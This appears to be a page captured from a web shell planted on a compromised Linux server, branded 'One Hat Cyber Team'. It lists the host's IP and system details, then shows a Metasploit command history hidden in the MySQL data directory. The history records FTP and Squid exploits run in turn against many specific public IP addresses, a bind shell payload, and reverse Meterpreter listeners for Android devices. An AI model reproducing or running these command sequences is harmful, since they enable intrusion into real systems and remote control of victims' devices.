One Hat Cyber Team
Your IP :
216.73.217.15
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
lib
/
mysql
/
.msf4
/
View File Name :
history
ls search nginx search apache search Lighttpd search Gopherd search Wu-ftpd use exploit/multi/ftp/wuftpd_site_exec_format show options set lport 0880 set lport 8080 set rhosts 66.129.41.254 run search payload search payload/linux run set rhosts 212.25.179.69 run set rhosts 46.24.199.106 run show options set rhosts 45.155.105.38 run set rhosts 50.53.67.8 run set rhosts 109.175.177.254 run set rhosts 92.173.122.141 run set rhosts 45.155.105.22 run set PAYLOAD linux/x86/shell_bind_tcp show options run set rhosts 66.129.41.254 run set rhosts 212.25.179.69 run set rhosts 46.24.199.106 run set rhosts 45.155.105.38 run set rhosts 50.53.67.8 run set rhosts 109.175.177.254 run set rhosts 92.173.122.141 run set rhosts 45.155.105.22 run set rhosts 66.129.41.254 run search wu-ftpd search squid use exploit/linux/proxy/squid_ntlm_authenticate show options set lport 8080 show options set rport 8080 set rhosts 212.201.193.226 run use exploit/multi/handler set payload android/meterpreter/reverse_tcp clear ifconfig set lhost 157.15.65.100 set lport 143 exploit set lport 4444 exploit quit use exploit/multi/handler set payload android/meterpreter/reverse_tcp ifconfig set lhost 157.15.65.100 set lport 143 exploit quit use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 180.250.113.149 set lport 143 exploit set lport 4444 run ifconfig set lhost 157.15.65.100 set lport 4444 run quit